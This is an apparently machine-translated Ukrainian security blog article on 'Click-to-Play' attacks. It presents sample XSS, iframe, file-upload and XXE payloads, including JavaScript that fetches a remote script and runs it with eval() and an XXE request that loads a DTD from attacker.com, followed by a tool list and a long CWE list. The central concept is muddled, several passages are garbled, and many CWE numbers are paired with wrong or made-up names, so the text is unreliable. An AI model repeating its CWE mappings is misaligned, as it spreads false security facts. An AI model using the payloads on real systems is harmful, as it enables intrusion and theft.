20 Лют, 2023

Атаки за принципом "Натисни, щоб відтворити"

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Атаки типу Click-to-Play (CTP) не мають офіційної абревіатури або назви. Зазвичай їх називають просто "атаками по клацанню миші" або іноді "атаками CTP".

Атаки за принципом "Натисни, щоб відтворити" - це тип кібератаки, при якому користувача обманом змушують натиснути на кнопку або посилання, які здаються законними, але насправді запускають шкідливий скрипт або завантаження. Метою атаки "Натисніть, щоб відтворити" зазвичай є встановлення шкідливого ПЗ на комп'ютер жертви, крадіжка конфіденційної інформації, такої як облікові дані для входу або особисті дані, або отримання несанкціонованого доступу до комп'ютерної системи. Атаки "Натисніть, щоб відтворити" можуть бути дуже ефективними, оскільки вони часто використовують тактику соціальної інженерії, щоб обманом змусити користувача перейти за шкідливої посиланням або завантажити шкідливий файл. Для захисту від CTP-атак важливо дотримуватися обережності при переході по посиланнях або завантаженні файлів з невідомих джерел, а також підтримувати своє програмне забезпечення і системи безпеки в актуальному стані.

Типи атак "Натисніть, щоб грати"

Атаки типу Click-to-Play (CTP) можуть приймати безліч різних форм, але деякі з найбільш поширених типів включають:

 1. Перенаправлення шкідливого веб-сайту: Цей тип CTP-атаки включає перенаправлення користувача на підроблений сайт, який здається законним, але призначений для крадіжки конфіденційної інформації або встановлення шкідливого ПО.

 2. Підроблені завантаження програмного забезпечення: Цей тип CTP-атаки включає в себе обман користувача з метою завантаження програмного забезпечення, яке здається законним, але насправді містить зловмисне програмне забезпечення чи інший шкідливий код.

 3. Фішингові шахрайства: фішингові шахрайства використовують тактику соціальної інженерії, щоб обманом змусити користувачів надавати конфіденційну інформацію, таку як облікові дані для входу або особисті дані. Атаки типу "Натисни, щоб грати" можуть використовуватися для перенаправлення користувачів на підроблену сторінку входу в систему або інший фішинговий сайт.

 4. Атаки на водопій: атака на водопій включає в себе компрометацію законного веб-сайту, який часто відвідує певна група користувачів, наприклад, працівники певної компанії. Коли цільові користувачі відвідують скомпрометований сайт, їм може бути запропоновано перейти за посиланням, або завантажити файл, який ініціює CTP-атаку.

 5. Завантаження диска: завантаження з диска - це тип CTP-атаки, яка ініціює завантаження шкідливого ПЗ або іншого шкідливого коду, коли користувач відвідує скомпрометований веб-сайт.

 6. Встановлення зловмисного програмного забезпечення: Цей тип CTP-атаки включає обман користувача з метою встановлення зловмисного програмного забезпечення, такого як підроблена антивірусна програма або системний оптимізатор, який насправді містить зловмисне програмне забезпечення чи інший шкідливий код.

Приклади різних запитів, які можна використовувати для тестування атак типу "Натисніть, щоб відтворити"

Burp Suite - це популярний інструмент тестування безпеки веб-додатків, який можна використовувати для аналізу та тестування на наявність атак типу "Натисніть, щоб відтворити" (CTP). Кілька прикладів різних запитів.

Запити на отримання і відправлення:

Запит GET - це тип HTTP-запиту, який витягає дані з веб-сервера.

				
					GET /login.php?username=attacker&password=123456 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://example.com/
Cookie: session=12345; user_id=67890
				
			

Цей запит GET запит login.php сторінка з параметрами імені користувача і пароля, встановленими на attackerи 123456, відповідно. Він також включає в себе різні HTTP-заголовки, такі як користувальницький агент, мова прийому і файли cookie.

POST запит - це тип HTTP-запиту, який відправляє дані на веб-сервер.

				
					POST /register.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

username=attacker&password=123456&email=evil@hacker.com
				
			

Цей POST-запит надсилається ім'я користувача, пароль і дані електронної пошти register.php сторінка. Він включає в себе різні HTTP-заголовки, такі як користувальницький агент, мова прийому і тип вмісту.

Запити JavaScript:

Запит JavaScript - це тип запиту, який використовує JavaScript для взаємодії з веб-сервером.

				
					<script>
 var xhr = new XMLHttpRequest();
 xhr.open('GET', 'https://example.com/malicious-script.js', true);
 xhr.onreadystatechange = function() {
  if (this.readyState === 4 && this.status === 200) {
   eval(this.responseText);
  }
 };
 xhr.send();
</script>
				
			

Цей запит JavaScript використовує об'єкт XMLHttpRequest для виконання запиту GET до malicious-script.js досьє на example.com сервер. Потім він використовує функцію eval() для виконання тексту відповіді.

ОТРИМАТИ запит за допомогою JavaScript:

				
					GET /search.php?q=<script>alert('XSS')</script> HTTP/1.1
Host: example.com
				
			

This GET request is searching for a query string parameter named “q” with the value “<script>alert(‘XSS’)</script>”. This value includes JavaScript code that will trigger an alert popup when the search results are displayed.

Надіслати запит за допомогою JavaScript:

				
					POST /submit-comment HTTP/1.1
Host: example.com
Content-Type: application/json
Content-Length: 36

{"comment": "<script>alert('XSS')</script>"}
				
			

Цей запит на публікацію являє собою відправку коментаря в example.com сервер, який використовує дані JSON (об'єктна нотація JavaScript). Дані коментаря включають код JavaScript, який викличе спливаюче вікно з попередженням при відображенні коментаря.

Зверніть увагу, що JavaScript також може бути включений в інші типи запитів, такі як відправка форм, завантаження файлів і AJAX-запитів.

AJAX -запитів:

AJAX-запит - це тип запиту, який використовує асинхронний JavaScript і XML (AJAX) для завантаження даних з веб-сервера без оновлення всієї сторінки.

				
					$.ajax({
  url: 'https://example.com/malicious-script.php',
  type: 'POST',
  data: {username: 'attacker', password: '123456'},
  dataType: 'json',
  success: function(response) {
    if (response.status === 'success') {
      eval(response.data);
    }
  },
  error: function(xhr, status, error) {
  console.log(error);
}
});
				
			

Цей AJAX - запит є використання бібліотека jQuery Для зробіть запит POST Для в malicious-script.php файл на в example.com сервер. Він відправляє ім'я користувача and дані паролю and чекає відповіді у форматі JSON. Якщо статус відповіді є "успіх"він використовує eval() function Для виконайте дані відповіді.

Ось приклад AJAX-запиту з використанням методу HTTP GET:

				
					$.ajax({
  type: "GET",
  url: "/api/get_data",
  data: {
    id: 123,
    name: "John Doe"
  },
  success: function(response) {
    console.log(response);
  }
});
				
			

У цьому прикладі запит GET виконується до кінцевої точки "/api/get_data" з двома параметрами рядка запиту, "id" та "name", для яких встановлено значення 123 і "John Doe" відповідно. Потім відповідь від сервера записується в консоль.

Ось приклад AJAX-запиту з використанням методу HTTP POST:

				
					POST /submit-comment HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
X-Requested-With: XMLHttpRequest

comment=Hello+world%21
				
			

Цей AJAX-запит надсилає коментар example.com сервер, що використовує об'єкт XHR (XMLHttpRequest). Він використовує метод POST і тип вмісту application/x-www-form-urlencoded для відправки даних коментаря.

Заголовок X-Requested-With має значення XMLHttpRequest, що є спільною угодою, використовується AJAX-запитів для ідентифікації себе на сервері.

Тіло запиту містить дані коментаря, які закодовані в форматі application/x-www-form-urlencoded. У цьому прикладі коментар звучить так: "Привіт, світ!".

Зверніть увагу, що запити AJAX можуть також використовувати інші методи HTTP, такі як POST, PUT і DELETE, і можуть включати тіла запитів з даними в різних форматах, таких як JSON, XML або дані форми.

Запити Iframe:

Запит iframe є тип а з запит, який завантажує вміст Від інший веб-сайт в iframe на веб-сторінка.

				
					<iframe src="https://malicious-site.com"></iframe>
				
			

Цей запит iframe завантажує malicious-page.html файл з example.com сервер всередині iframe на веб-сторінці.

ОТРИМАТИ запит за допомогою iframe:

				
					GET /index.php?page=<iframe src="https://malicious-site.com"></iframe> HTTP/1.1
Host: example.com
				
			

Цей запит GET запитує сторінку з параметром рядка запиту з ім'ям "сторінка", який включає в себе iframe. Атрибут src iframe встановлюється на URL-адресу шкідливого сайту.

Надіслати запит за допомогою iframe:

				
					POST /submit-comment HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

comment=<iframe src="https://malicious-site.com"></iframe>
				
			

Цей запит на публікацію являє собою відправку коментаря в example.com сервер з iframe, включеним в дані коментаря. Атрибут src iframe встановлюється на URL-адресу шкідливого сайту.

Зверніть увагу, що iframes також можуть бути включені в інші типи запитів, такі як дані JSON або запити AJAX.

Запити об'єктів:

Об'єктний запит - це тип запиту, який завантажує об'єкт, такий як Flash-анімація або Java-аплет, з веб-сервера.

				
					<object type="application/x-shockwave-flash" data="https://example.com/malicious-flash.swf">
  <param name="movie" value="https://example.com/malicious-flash.swf">
  <param name="allowScriptAccess" value="always">
</object>
				
			

Цей об'єктний запит завантажує файл malicious-flash.swf з example.com сервер. Він використовує дані об'єкта, так і атрибути імені / значення параметра для визначення флеш-анімації і дозволу доступу до сценарію.

Запити зображень:

Запит зображення - це тип запиту, який завантажує файл зображення з веб-сервера.

				
					<img decoding="async" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://example.com/malicious-image.jpg"><noscript><img decoding="async" class="lazyload" src="https://example.com/malicious-image.jpg"></noscript>
				
			

Цей запит завантажує зображення malicious-image.jpg файл з example.com сервер. Це простий приклад, але запити зображень можна використовувати для завантаження інших типів контенту, таких як файли JavaScript або CSS.

Запити на посилання:

Запит посилання - це тип запиту, який завантажує веб-сторінку або ресурс, коли користувач натискає на посилання.

				
					<a href="https://example.com/malicious-page.html">Click here to view the malicious page</a>
				
			

Цей запит на посилання завантажує malicious-page.html файл з example.com сервер, коли користувач натискає на текст гіперпосилання.

Формуйте запити:

Запит форми - це тип запиту, який надсилається, коли користувач заповнює та надсилає форму на веб-сторінці.

				
					<form action="https://example.com/malicious-form.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Submit">
</form>
				
			

Цей запит форми являє собою відправку даних імені користувача і пароля malicious-form.php досьє на example.com сервер, коли користувач натискає кнопку відправки.

Запити на завантаження файлів:

				
					POST /upload.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------16890064901016227981240124924
Content-Length: 1024

-----------------------------16890064901016227981240124924
Content-Disposition: form-data; name="file"; filename="malicious-file.php"
Content-Type: application/octet-stream

<?php echo "I am a malicious file!"; ?>

-----------------------------16890064901016227981240124924--
				
			

Цей запит на завантаження файлу відправляє malicious-file.php файл upload.php досьє на example.com сервер. Він використовує тип вмісту multipart / form-data і граничну рядок для розділення різних частин запиту.

Тіло запиту містить дані файлу, які інкапсулюються в розділ даних форми. Розділ включає в себе параметр ім'я "file", який є ключем, який сервер буде використовувати для доступу до даних файлу. Параметр filename має значення "malicious-file.php ", який є іменем файлу, що завантажується. Параметр Content-Type має значення application/octet-stream, який представляє собою загальний двійковий тип даних.

Фактичні дані файлу включаються в тіло запиту між граничними строками. У цьому прикладі дані файлу представляють собою простий PHP-скрипт, який передає ехо-повідомлення, яке вказує, що це шкідливий файл.

				
					POST /test.php HTTP/1.1
Host: example.com
Content-Type: multipart/related; boundary="boundary"

--boundary
Content-Type: text/xml; charset=utf-8
Content-Transfer-Encoding: 8bit

<?xml version="1.0"?>
<!DOCTYPE message [
 <!ENTITY % ext SYSTEM "http://attacker.com/external.dtd">
 %ext;
]>
<message>&payload;</message>

--boundary
Content-Type: application/octet-stream
Content-Transfer-Encoding:

				
			

У цьому прикладі зовнішній файл DTD розміщений в домені зловмисника. Файл DTD містить додаткові об'єкти, такі як "корисне навантаження", які можуть бути використані для виконання атаки XXE. Корисне навантаження атаки включається як вкладення до запиту.

Важливо відзначити, що ці атаки є лише верхівкою айсберга, і існує безліч варіантів і комбінацій атак, які можуть бути використані для використання вразливостей XXE.

Приклади використання атак "Натисніть, щоб відтворити"

Атаки типу Click-to-Play (CTP) можуть використовуватися зловмисниками різними способами в залежності від конкретної уразливості, на яку вони спрямовані.

Загальні приклади того, як зловмисник може використовувати атаку CTP:

 1. Ін'єкційні атаки: зловмисники можуть використовувати CTP-атаки для впровадження шкідливого коду веб-додаток або веб-сайт. Наприклад, зловмисник може використовувати CTP-атаку для впровадження скрипта, який краде облікові дані користувача або конфіденційну інформацію.

 2. Міжсайтовий скриптінг (XSS): зловмисники можуть використовувати CTP-атаки для виконання шкідливих сценаріїв в браузері жертви. Наприклад, зловмисник може використовувати CTP-атаку для впровадження скрипта, який перенаправляє користувача на шкідливий веб-сайт або краде конфіденційну інформацію з браузера користувача.

 3. Доставка шкідливого ПО: зловмисники можуть використовувати CTP-атаки для доставки шкідливого ПЗ на комп'ютер жертви. Наприклад, зловмисник може використовувати CTP-атаку, щоб обманом змусити користувача завантажити і запустити шкідливий файл.

 4. Соціальна інженерія: зловмисники можуть використовувати CTP-атаки, щоб обманом змусити користувачів виконувати дії, що ставлять під загрозу їх безпеку. Наприклад, зловмисник може використовувати CTP-атаку, щоб обманом змусити користувача ввести свої облікові дані для входу на підроблену сторінку входу.

CTP-атаки часто використовуються у поєднанні з іншими методами атаки, такими як фішинг або соціальна інженерія, для підвищення їх ефективності.

Методи підвищення привілеїв Атаки "Натисніть, щоб відтворити"

 1. Використання вразливостей в додатку або операційній системі: зловмисники можуть використовувати CTP-атаки для використання відомих або невідомих вразливостей в додатку або операційній системі для отримання підвищених привілеїв. Наприклад, зловмисник може використовувати CTP-атаку, щоб скористатися уразливістю переповнення буфера в додатку і виконати довільний код з підвищеними привілеями.

 2. Крадіжка або злом облікових даних: зловмисники можуть використовувати CTP-атаки для крадіжки або злому облікових даних, таких як імена користувачів і паролі, щоб отримати доступ до більш високих рівнів привілеїв. Наприклад, зловмисник може використовувати CTP-атаку для впровадження скрипта, який краде ваші облікові дані і використовує їх для отримання доступу до привілейованих областях додатки.

 3. Використання інших уразливостей: Зловмисники можуть використовувати CTP-атаки для використання інших вразливостей в додатку або операційній системі для отримання підвищених привілеїв. Наприклад, зловмисник може використовувати CTP-атаку для впровадження сценарію, який використовує уразливість локального включення файлів для отримання доступу до конфіденційних файлів в системі.

 4. Використання неправильно налаштованих дозволів: зловмисники можуть використовувати атаки CTP для використання неправильно налаштованих дозволів для отримання підвищених привілеїв. Наприклад, зловмисник може використовувати CTP-атаку для впровадження сценарію, який змінює дозволу для файлу або каталогу, що дозволяє зловмиснику виконувати код з підвищеними привілеями.

Загальна методологія та контрольний список для тестування атак Click-to-Play

 1. Визначте мета: визначити цільове додаток або системи, які будуть протестовані на предмет CTP-атак. Це може бути веб-додаток, настільне додаток або мобільний додаток.

 2. Визначте поверхню атаки: Визначте потенційні точки входу для CTP-атак. Це може включати завантаження файлів, поля введення, виклики API і інші типи даних.

 3. Визначте вектори атак: визначте різні типи CTP-атак, які можуть бути використані для використання ідентифікованої поверхні атаки. Це може включати HTML, JavaScript, Flash та інші типи медіафайлів.

 4. Створення корисних навантажень для атаки: розробка корисних навантажень для атаки, які будуть використовуватися для тестування цільового програми або системи. Це може включати створений HTML, JavaScript або інші типи медіафайлів, що містять шкідливий код.

 5. Протестуйте корисну навантаження атаки: використовувати такі інструменти, як Burp Suite або OWASP ZAP, щоб протестувати корисну навантаження атаки на цільове додаток або систему. Це може включати ручне тестування корисних навантажень або використання автоматизованих інструментів тестування.

 6. Проаналізуйте результати: перегляньте результати тестування, щоб визначити, чи були виявлені які-небудь вразливості або слабкі місця. Це може включати в себе вивчення реакції додатки або системи на корисну навантаження атаки або перегляд журналів і повідомлень про помилки.

 7. Повідомте про результати: Документуйте будь вразливості або слабкі місця, виявлені в ході тестування, і повідомляйте про них відповідним зацікавленим сторонам. Це можуть бути розробники, системні адміністратори чи групи безпеки.

 8. Перевірка усунення: Після виявлення вразливостей переконайтеся, що вони були усунені, повторно протестувавши додаток або систему. Це робиться для того, щоб переконатися, що виявлені уразливості були належним чином усунуто.

На додаток до вищезгаданих кроків, при тестуванні CTP-атак важливо мати на увазі наступний контрольний список:

Протестуйте різні браузери і платформи, щоб виявити будь-які проблеми, що залежать від конкретної платформи.

Протестуйте різні типи медіафайлів, такі як PDF-файли, зображення і відео, щоб виявити будь-які проблеми, залежать від типу файлу.

Протестуйте різні ролі користувачів і рівні доступу, щоб виявити будь-які уразливості з підвищенням привілеїв.

Перевірте уразливості перевірки вхідних даних, щоб переконатися, що вхідні дані належним чином очищені і перевірені.

Перевірте на наявність вразливостей в управлінні сеансами, щоб переконатися, що сеанси належним чином управляються і проходять перевірку автентичності.

Перевірте уразливості міжсайтового скриптинга (XSS), оскільки CTP-атаки часто включають впровадження шкідливих скриптів на веб-сторінки.

Протестуйте вразливості для підробки міжсайтових запитів (CSRF), оскільки атаки CTP можуть використовуватися для ініціювання несанкціонованих дій від імені користувача.

Дотримуючись цієї методології і контрольним списком, тестувальники можуть виявляти і повідомляти про уразливості, пов'язаних з CTP-атаками, і допомагати підвищувати безпеку цільового програми або системи.

Набір інструментів для використання атак "Натисни, щоб грати"

Ручні інструменти:

1. Burp Suite: популярний інструмент тестування веб-додатків, який можна використовувати для перевірки вразливостей CTP шляхом перехоплення і зміни HTTP-запитів.
2. OWASP ZAP: Ще один інструмент тестування веб-додатків, який можна використовувати для виявлення і використання вразливостей CTP.
3. Chrome DevTools: вбудований інструмент в браузері Google Chrome, який можна використовувати для налагодження і тестування веб-сторінок, включаючи виявлення та використання вразливостей CTP.
4. Firebug: розширення для браузера Firefox, яке можна використовувати для налагодження і тестування веб-сторінок, включаючи виявлення та використання вразливостей CTP.
5. Дані для несанкціонованого доступу: розширення для браузера Firefox, яке дозволяє користувачам переглядати та змінювати HTTP-запити, що робить його корисним для тестування вразливостей CTP.

Автоматизовані інструменти:

1. Metasploit Framework: популярна платформа тестування на проникнення, яка включає в себе ряд інструментів та модулів для використання вразливостей CTP.
2. Arachni: автоматизований сканер веб-додатків, який можна використовувати для виявлення і використання вразливостей CTP.
3. SQLMap: автоматизований інструмент для виявлення і використання вразливостей SQL-ін'єкцій, який може використовуватися в поєднанні з CTP-атаками для підвищення привілеїв.
4. BeEF: платформа для використання браузера, яка може використовуватися для запуску CTP-атак проти веб-браузерів.
5. XSStrike: автоматизований інструмент для виявлення і використання вразливостей міжсайтового скриптинга (XSS), який може використовуватися в поєднанні з CTP-атаками для впровадження шкідливого коду на веб-сторінки.
6. Fiddler: проксі-інструмент для веб-налагодження, який можна використовувати для перехоплення і зміни HTTP-запитів, що робить його корисним для тестування вразливостей CTP.
7. Vega: сканер веб-вразливостей, який можна використовувати для виявлення і використання вразливостей CTP.
8. Nikto: сканер веб-сервер з відкритим вихідним кодом, який можна використовувати для виявлення і використання вразливостей CTP.
9. Nmap: інструмент дослідження мережі та аудиту безпеки, який можна використовувати для виявлення і використання вразливостей CTP на мережевих пристроях.
10. Dirbuster: інструмент для тестування веб-каталогів та файлів методом перебору, який можна використовувати для виявлення і використання вразливостей CTP.

Плагіни для браузера:

1. Веб-розробник: розширення для браузера Firefox і Chrome, яке включає в себе ряд інструментів для налагодження і тестування веб-сторінок, включаючи виявлення та використання вразливостей CTP.
2. HackBar: розширення для браузера Firefox і Chrome, який можна використовувати для тестування і зміни HTTP-запитів, що робить його корисним для тестування вразливостей CTP.
3. FoxyProxy: розширення для браузера Firefox і Chrome, який можна використовувати для перехоплення і зміни HTTP-запитів, що робить його корисним для тестування вразливостей CTP.

Тестові фреймворки:

1. Керівництво по тестуванню OWASP: комплексна платформа тестування, розроблена Open Web Application Security Project (OWASP), яка включає в себе керівництво по тестуванню вразливостей CTP.
2. PTES: платформа тестування на проникнення, яка включає в себе керівництво по тестуванню вразливостей CTP, а також інших типів вразливостей безпеки.

Середній бал CVSS Атаки за принципом "Натисни, щоб відтворити"

CVSS - це стандартний метод оцінки серйозності вразливостей в системі безпеки за шкалою від 0 до 10, причому 10 є найбільш серйозними. Оцінка CVSS враховує декілька чинників, включаючи простоту використання, вплив на систему і рівень доступу, необхідний для використання уразливості.

В цілому, уразливості, які дозволяють зловмиснику виконувати шкідливий код або отримувати несанкціонований доступ до конфіденційних даних, будуть мати більш високий бал CVSS, в той час як уразливості, які надають обмежену дію або вимагають значних зусиль для використання, будуть мати більш низький бал.

Багато CTP-атаки пов'язані з використанням вразливостей в браузерах або плагінах, які зазвичай використовуються для доставки шкідливого коду або крадіжки конфіденційної інформації. Серйозність цих атак може варіюватися від низької до високої, в залежності від конкретної використовуваної уразливості і рівня доступу, необхідного для її використання.

Атаки типу Click-to-Play з загальним перерахуванням слабких місць (CWE)

 1. CWE-602: Забезпечення безпеки на стороні клієнта на стороні сервера: використання механізмів безпеки на стороні клієнта, таких як CTP, може бути обійдена зловмисниками, які змінюють або код трафік на стороні клієнта, щоб обійти засоби контролю безпеки.

 2. CWE-829: Включення функціональності сфери ненадійного контролю: Атаки CTP можуть призвести до включення ненадійного коду в довірену середовище, що дозволяє проводити різні типи атак.

 3. CWE-912: Прихована функціональність: CTP-атаки можуть використовуватися для приховування шкідливої функціональності або коду, що виконується, коли користувач натискає на уявну законної посилання або кнопку.

 4. CWE-918: Підробка запитів на стороні сервера (SSRF): CTP-атаки можуть використовуватися для запуску SSRF-атак шляхом обману користувачів, змушуючи їх відправляти запити на сервер зловмисника замість передбачуваної мети.

 5. CWE-933: Неправильний контроль частоти взаємодії: атаки CTP можуть використовуватися для повторного спонукання до виконання дії, що може призвести до втоми та помилок користувачів.

 6. CWE-937: Передбачувана слабкість програмного забезпечення: CTP-атаки можуть бути викликані передбачуваними або легко вгадуваним шаблонами в поведінці додатка або інтерфейсі.

 7. CWE-943: Надмірно дозвільний міждоменної білий список: атаки CTP можуть використовуватися для обходу міждоменної обмежень шляхом використання надмірно дозвільних білих списків.

 8. CWE-999: Неправильне управління привілеями: Атаки CTP можуть призвести до неправильного управління привілеями, що дозволяє непривілейованим користувачам виконувати привілейовані дії.

 9. CWE-1004: Недостатньо захищені облікові дані: атаки CTP можуть використовуватися для крадіжки облікових даних користувача або токенів сеансу, що дозволяє зловмисникам обійти аутентифікацію і отримати несанкціонований доступ до конфіденційних ресурсів.

 10. CWE-1021: Неправильне обмеження відображуваних шарів або фреймів інтерфейсу: атаки CTP можуть використовуватися для впровадження шкідливого контенту в шари або фрейми користувальницького інтерфейсу, що дозволяє зловмисникам перехоплювати взаємодія з користувачем або виконувати шкідливий код.

 11. CWE-1035: виконання з непотрібними привілеями: атаки CTP можуть використовуватися для виконання коду з непотрібними привілеями, потенційно дозволяючи зловмисникам підвищувати привілеї або виконувати несанкціоновані дії.

 12. CWE-1059: Фіксація сеансу: атаки CTP можуть використовуватися для фіксації сеансів користувачів на шкідливий ідентифікатор сеансу, що дозволяє зловмисникам перехоплювати сеанси користувачів і виконувати несанкціоновані дії.

 13. CWE-1062: Недостатньо захищені дані при передачі: атаки CTP можуть використовуватися для перехоплення або зміни переданих даних, що може призвести до крадіжки або маніпулювання даними.

 14. CWE-1105: Використання криптографічно слабких генераторів псевдовипадкових чисел (PRNG): Атаки CTP можуть використовуватися для використання слабких PRNG і прогнозування або маніпулювання випадковими значеннями, що потенційно призводить до вразливостей в системі безпеки.

 15. CWE-1113: Неправильна нейтралізація спеціальних елементів, використовуваних в SQL-команди ("SQL-ін'єкція"): CTP-атаки можуть використовуватися для впровадження шкідливих SQL-команд і маніпулювання або крадіжки даних з баз даних.

 16. CWE-1135: Неправильне використання криптографії: Атаки CTP можуть використовуватися для використання неправильного використання криптографії, що може призвести до крадіжки або маніпулювання даними.

 17. CWE-1140: Передача конфіденційної інформації відкритим текстом: атаки CTP можуть використовуватися для перехоплення або крадіжки конфіденційної інформації, яка передається відкритим текстом.

 18. CWE-1168: Неправильно настроєна междоменная політика: атаки CTP можуть використовуватися для обходу міждоменної політик, які неправильно налаштовані або не застосовуються.

 19. CWE-1176: Неправильна обробка кодування Unicode: атаки CTP можуть використовуватися для використання неправильної обробки кодування Unicode, що може призвести до вразливостей в системі безпеки.

 20. CWE-400: неконтрольоване споживання ресурсів ('Виснаження ресурсів') Опис: Атаки типу Click-to-Play можуть використовуватися для споживання великих обсягів системних ресурсів, що призводить до відмови в обслуговуванні (DoS). Приклад: зловмисник може створити веб-сторінку, яка використовує надмірний обсяг процесора, пам'яті, коли користувач натискає на кнопку або посилання, у результаті чого система виходить з ладу або перестає відповідати на запити.

 21. CWE-611: Неправильне обмеження посилання на зовнішню сутність XML Опис: Атаки типу "Натисніть, щоб відтворити" можуть використовуватися для використання неправильної обробки посилань на зовнішню сутність XML (XXE), дозволяючи зловмиснику зчитувати конфіденційну інформацію або виконувати віддалений код. Приклад: Зловмисник може створити веб-сторінку, що містить шкідливий XML-файл з посиланням на зовнішню сутність, яка вказує на файл, який містить конфіденційну інформацію в системі жертви.

 22. CWE-601: перенаправлення URL-адреси на ненадійний сайт ('Відкрити перенаправлення') Опис: Атаки типу "Натисни, щоб грати" можуть використовуватися для перенаправлення користувачів на шкідливі або небезпечні веб-сайти, що призводить до фішинговим або шкідливих атак. Приклад: Зловмисник може створити веб-сторінку, яка використовує атаку "Натисніть, щоб відтворити" для перенаправлення користувачів на підроблену сторінку входу на законний веб-сайт, обманом змушуючи їх вводити свої облікові дані і дозволяючи зловмиснику вкрасти їх.

 23. CWE-829: Включення функціональності сфери ненадійного контролю Опис: Атаки типу "Натисніть, щоб відтворити" можуть використовуватися для виконання коду з ненадійного джерела, дозволяючи зловмиснику отримати контроль над системою жертви. Приклад: Зловмисник може створити веб-сторінку, що містить шкідливий скрипт з зовнішнього сайту, який виконується, коли користувач натискає на кнопку або посилання, дозволяючи зловмиснику отримати контроль над системою жертви.

 24. CWE-352: Підробка міжсайтових запитів (CSRF) Опис: Атаки типу "Натисніть, щоб відтворити" можуть використовуватися для виконання CSRF-атак, що дозволяє зловмиснику виконувати несанкціоновані дії від імені жертви. Приклад: Зловмисник може створити веб-сторінку, яка використовує атаку "Натисни, щоб грати", щоб обманом змусити жертву виконати шкідливе дію на законній веб-сайті, наприклад, змінити пароль або здійснити покупку.

 25. CWE-113: неправильна нейтралізація послідовності CRLF в заголовках HTTP ('Поділ відповіді HTTP') Опис: Атаки типу Click-to-Play можуть використовуватися для використання неправильної обробки послідовностей CRLF в заголовках HTTP, дозволяючи зловмиснику вводити довільний контент у відповідь. Приклад: Зловмисник може створити веб-сторінку, яка включає атаку "Натисніть, щоб відтворити", яка вводить шкідливий HTTP-заголовок у відповідь, дозволяючи їм вкрасти конфіденційну інформацію або виконати інші шкідливі дії.

 26. CWE-131: неправильне обчислення розміру буфера Опис: Атаки типу "Натисніть, щоб відтворити" можуть використовуватися для використання неправильних обчислення розміру буфера, що дозволяє зловмисникові перезаписувати пам'ять і виконувати довільний код. Приклад: Зловмисник може створити веб-сторінку, яка включає атаку "Натисніть, щоб відтворити", яка викликає переповнення буфера в браузері жертви, дозволяючи їм виконувати довільний код.

 27. CWE-20: Неправильна перевірка вводу Опис. Атаки з використанням методу "Натисніть, щоб відтворити" можуть використовуватися для використання неправильної перевірки введення, що дозволяє зловмиснику виконувати шкідливі дії або красти конфіденційну інформацію. Приклад: Зловмисник може створити веб-сторінку, яка включає атаку "Натисніть, щоб відтворити", яка використовує уразливість в браузері жертви або плагіні, дозволяючи їм виконувати довільний код або красти конфіденційну інформацію.

 28. CWE-255: Керування обліковими даними: може дозволити зловмиснику отримати ваші облікові дані для входу або іншу конфіденційну інформацію, використовуючи слабкі місця в механізмі захисту CTP. Наприклад, зловмисник може впровадити шкідливий код на веб-сторінку, захищену CTP, яка фіксує облікові дані користувача при введенні їх у форму.

 29. CWE-118: Неправильний контроль доступу: може дозволити зловмиснику обійти механізм захисту CTP і запустити шкідливий контент без відома користувача. Наприклад, якщо захист CTP реалізована тільки на певних веб-сторінках або певних типах файлів, зловмисник може обманом змусити користувача відвідати шкідливий веб-сайт або відкрити шкідливий файл, який не захищений CTP.

 30. CWE-338: Використання криптографічно слабкого генератора псевдовипадкових чисел (PRNG): цей CWE пов'язаний з використанням слабкого чи передбачуваного генератора випадкових чисел, який може зробити криптографічні операції, такі як генерація ключів або створення захищених каналів зв'язку, уразливими для атак.

 31. CWE-347: Неправильна перевірка криптографічного підписи: цей CWE пов'язаний з неправильною перевіркою криптографічних підписів, що може дозволити зловмисникам видавати себе за довірені об'єкти або змінювати дані без виявлення.

 32. CWE-352: Підробка міжсайтових запитів (CSRF): цей CWE пов'язаний зі здатністю зловмисника змусити браузер жертви виконувати несанкціоновані дії у веб-додатку, як правило, шляхом обману жертви, змушуючи її перейти по шкідливої посиланням або відвідати шкідливий веб-сайт.

 33. CWE-434: необмежена завантаження файлу з небезпечним типом: цей CWE пов'язаний зі здатністю зловмисника завантажувати файли небезпечних типів, такі як виконувані файли, які можуть бути використані для компрометації сервера або інших клієнтів, які отримують доступ до додатка.

 34. CWE-601: перенаправлення URL на ненадійний сайт ("Відкрите перенаправлення"): це CWE пов'язано зі здатністю зловмисника перенаправляти браузер жертви на ненадійний веб-сайт, зазвичай шляхом маніпулювання параметром URL, який може використовуватися для фішингових атак або для доставки шкідливого ПО.

 35. CWE-807: Залежність від ненадійних вхідних даних при прийнятті рішення про безпеки: цей CWE пов'язаний із залежністю від ненадійних вхідних даних, таких як надані користувачем дані для прийняття рішень щодо безпеки, таких як аутентифікація або контроль доступу, які можуть бути використані зловмисниками для отримання несанкціонованого доступу чи виконання шкідливих дій.

 36. CWE-918: Підробка запитів на стороні сервера (SSRF): цей CWE пов'язаний зі здатністю зловмисника змусити сервер відправляти несанкціоновані запити до інших серверів або служб, які можуть бути використані для обходу контролю доступу або отримання конфіденційної інформації.

 37. CWE-933: неправильний контроль довіреної шляху / каналу: цей CWE пов'язаний з відсутністю належного контролю над довіреними шляхами або каналами, такими як мережеві підключення або файлові системи, що може дозволити зловмисникам перехоплювати або змінювати конфіденційні дані.

